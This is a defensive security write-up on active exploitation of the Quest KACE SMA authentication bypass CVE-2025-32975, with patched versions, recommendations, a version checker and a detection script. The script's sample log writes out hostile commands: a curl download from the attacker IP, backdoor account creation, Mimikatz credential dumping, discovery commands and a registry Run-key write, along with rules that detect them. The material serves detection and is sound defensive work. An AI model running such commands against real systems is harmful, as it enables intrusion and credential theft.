Quest KACE CVSS 10.0 Authentication Bypass Exploited to Hijack Admin Accounts and Target Backup Infrastructure

Arctic Wolf observes active exploitation of CVE-2025-32975 in Quest KACE SMA — a maximum-severity authentication bypass enabling full admin takeover, Mimikatz credential harvesting, and RDP access to Veeam and Veritas backup systems.

Threat actors are actively exploiting CVE-2025-32975, a CVSS 10.0 authentication bypass in Quest KACE Systems Management Appliance (SMA), to seize administrative control of unpatched systems exposed to the internet and pivot into backup infrastructure, according to Arctic Wolf.

The malicious activity was first observed the week of March 9, 2026 across multiple customer environments. The vulnerability, patched by Quest in May 2025, allows attackers to impersonate legitimate users without valid credentials — enabling complete takeover of administrative accounts. Systems that remain unpatched nearly ten months after the fix are now being actively targeted.

Attack Chain

Arctic Wolf documented a multi-stage post-exploitation sequence following initial admin account takeover:

1. Initial exploitation — attackers weaponize CVE-2025-32975 to bypass authentication and gain administrative access to the KACE SMA console

2. Payload delivery — remote commands execute via the compromised admin interface, using curl to download Base64-encoded payloads from an external server (216.126.225[.]156)

3. Persistence — additional administrative accounts are created through runkbot.exe, a legitimate SMA Agent background process used for script execution and installation management. Windows Registry modifications via PowerShell scripts indicate further persistence or system configuration changes

4. Credential harvesting — Mimikatz deployed to dump credentials from memory

5. Reconnaissance — enumeration of logged-in users, administrator accounts, and domain information via net time and net group commands

6. Backup infrastructure targeting — attackers obtain RDP access to Veeam and Veritas backup servers as well as domain controllers

Backup Infrastructure as the End Goal

The deliberate targeting of Veeam and Veritas backup systems alongside domain controllers is a hallmark of ransomware pre-positioning. Attackers who control both Active Directory and backup infrastructure can encrypt an environment with confidence that recovery options have been eliminated.

While Arctic Wolf states the ultimate goal of the attacks is currently unknown, the tactical pattern — admin takeover, credential harvesting, discovery, and backup access — is consistent with the preparation phase of a ransomware deployment.

Patched Versions

The vulnerability has been addressed in the following Quest KACE SMA versions:

  • 13.0.385
  • 13.1.81
  • 13.2.183
  • 14.0.341 (Patch 5)
  • 14.1.101 (Patch 4)
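The fixed builds above are per release branch, so a naive "is my version higher than 14.1.101?" check gets the answer wrong in both directions (13.2.200 is patched even though 200 is below 341; 14.0.300 is vulnerable even though 14.0 is above 13.2). The following is an added example written for this write-up, not Quest's or Arctic Wolf's code: it takes the fixed-version list from the article, matches on the major.minor branch, and reports a build on an unlisted branch as unknown rather than guessing. The version string format (`major.minor.build`, optional trailing patch label) is an assumption.

```python
"""Check a Quest KACE SMA version string against the branch-specific fixed
builds listed for CVE-2025-32975.

Added example for this article, not vendor code. Fixed builds come from the
article; branch matching and the version-string format are assumptions.
"""
from typing import Tuple

# Fixed builds from the article, keyed by major.minor release branch.
FIXED_BY_BRANCH = {
    (13, 0): 385,
    (13, 1): 81,
    (13, 2): 183,
    (14, 0): 341,   # Patch 5
    (14, 1): 101,   # Patch 4
}


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse 'major.minor.build'; trailing labels such as '(Patch 5)' are ignored."""
    core = text.strip().split()[0]
    parts = core.split(".")
    if len(parts) < 3:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, build = (int(p) for p in parts[:3])
    return major, minor, build


def assess(version: str) -> str:
    """Return 'patched', 'vulnerable' or 'unknown-branch' for a KACE SMA version.

    Comparison is done within the release branch only: a build is patched
    when it is at or above that branch's fixed build. Branches the article
    does not list are reported as unknown so the caller can check the
    vendor advisory instead of assuming.
    """
    major, minor, build = parse_version(version)
    fixed_build = FIXED_BY_BRANCH.get((major, minor))
    if fixed_build is None:
        return "unknown-branch"
    return "patched" if build >= fixed_build else "vulnerable"


if __name__ == "__main__":
    for v in ["13.0.385", "13.2.100", "14.0.341 (Patch 5)", "14.0.300", "14.2.10"]:
        print(f"{v:22} -> {assess(v)}")
```

Feed it the version string from the appliance's own administration console or from an inventory export; anything reporting `vulnerable` on an internet-reachable host belongs at the top of the patch queue.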

Defender Recommendations

  • Patch immediately — this is a CVSS 10.0 vulnerability with confirmed exploitation; any internet-exposed KACE SMA instance running an unpatched version should be treated as an emergency
  • Remove KACE SMA from the internet — management interfaces should not be publicly accessible under any circumstances
  • Audit administrative accounts — check for any accounts created via runkbot.exe or through unexpected admin console activity since March 9
  • Hunt for Mimikatz artifacts — search for credential harvesting indicators across endpoints managed by compromised KACE instances
  • Protect backup infrastructure — restrict RDP access to Veeam and Veritas servers, enforce MFA, and ensure backup systems are network-segmented from general administrative access
  • Monitor for discovery commands — flag execution of net time, net group, and user enumeration commands from KACE-managed systems
  • Check for Registry modifications — review PowerShell-driven Registry changes on endpoints within affected environments
  • Block the IOC — add 216.126.225[.]156 to blocklists
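Several of the recommendations above (auditing accounts created via runkbot.exe, hunting for Mimikatz, flagging `net time` / `net group` discovery, reviewing PowerShell registry writes, and blocking the IOC) reduce to the same exercise: run a handful of behavioural rules over process-creation telemetry. The script below is an added example written for this article, not Arctic Wolf's or Quest's tooling. The log format (one JSON object per line with `host`, `parent`, `image` and `cmdline` fields) and the sample records are constructed for the demonstration; the IOC address and the command patterns are taken from the write-up. Matching is deliberately broad and case-insensitive so that it can be tuned to real telemetry.

```python
"""Hunt for the post-exploitation behaviours described in the article in
process-creation style log records.

Added example, not vendor or Arctic Wolf tooling. The log format and the
SAMPLE_LOG records are constructed; the IOC and command patterns come from
the article.
"""
import json
import re
from typing import Callable, Dict, List, Set, Tuple

IOC_IP = "216.126.225.156"   # written defanged in the article as 216.126.225[.]156

# Each rule is (name, predicate). Predicates receive lower-cased fields.
RULES: List[Tuple[str, Callable[[Dict[str, str]], object]]] = [
    ("ioc-download",
     lambda r: "curl" in r["image"] and IOC_IP in r["cmdline"]),
    # Behavioural twin of the IOC rule: survives a change of staging server.
    ("base64-payload",
     lambda r: "curl" in r["image"] and "base64" in r["cmdline"]),
    # Account creation launched by the SMA agent's script runner.
    ("runkbot-account-creation",
     lambda r: r["parent"].endswith("runkbot.exe")
     and re.search(r"\bnet1?\s+user\b.*\s/add\b", r["cmdline"])),
    # Binary name or the well-known module keyword (catches renamed copies).
    ("mimikatz",
     lambda r: "mimikatz" in r["image"] or "sekurlsa" in r["cmdline"]),
    ("net-discovery",
     lambda r: re.search(r"\bnet1?\s+(time|group)\b", r["cmdline"])),
    ("powershell-registry-write",
     lambda r: "powershell" in r["image"]
     and re.search(r"(set-itemproperty|new-itemproperty)\s+-path\s+hk", r["cmdline"])),
]


def normalise(record: Dict[str, str]) -> Dict[str, str]:
    """Lower-case the fields the rules inspect; missing fields become ''."""
    return {k: str(record.get(k, "")).lower() for k in ("host", "parent", "image", "cmdline")}


def classify(record: Dict[str, str]) -> List[str]:
    """Return the names of every rule a single record triggers."""
    r = normalise(record)
    return [name for name, pred in RULES if pred(r)]


def hunt(lines: List[str]) -> Dict[str, List[str]]:
    """Map host -> sorted unique rule names hit on that host."""
    hits: Dict[str, Set[str]] = {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        names = classify(record)
        if names:
            hits.setdefault(record["host"], set()).update(names)
    return {host: sorted(names) for host, names in hits.items()}


# Constructed sample telemetry: one record per line, modelled on the chain
# in the article. ws-017 is a benign control record.
SAMPLE_LOG = r"""
{"host": "kace-sma01", "parent": "/bin/sh", "image": "/usr/bin/curl", "cmdline": "curl -s http://216.126.225.156/p.b64 | base64 -d > /tmp/p"}
{"host": "ws-042", "parent": "C:\\Program Files (x86)\\Quest\\KACE\\runkbot.exe", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c net user svc_backup P@ss /add && net localgroup administrators svc_backup /add"}
{"host": "ws-042", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Temp\\mimikatz.exe", "cmdline": "mimikatz.exe sekurlsa::logonpasswords"}
{"host": "ws-042", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net group \"Domain Admins\" /domain"}
{"host": "ws-042", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net time /domain"}
{"host": "ws-042", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -nop -c Set-ItemProperty -Path HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name upd -Value C:\\Temp\\u.exe"}
{"host": "ws-017", "parent": "explorer.exe", "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net use Z: \\\\fileserver\\share"}
"""

if __name__ == "__main__":
    for host, names in hunt(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: {', '.join(names)}")
```

Two design points worth keeping when porting this to a SIEM: pair every atomic indicator (the IP) with a behavioural rule (curl piping into base64) so the detection survives infrastructure rotation, and key results by host so that a single endpoint accumulating several distinct stages (account creation, credential dumping, discovery, registry write) stands out from isolated, possibly benign, `net group` calls. The final stage in the article, RDP access to Veeam and Veritas servers, lives in logon telemetry rather than process creation and needs a separate rule on those hosts.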
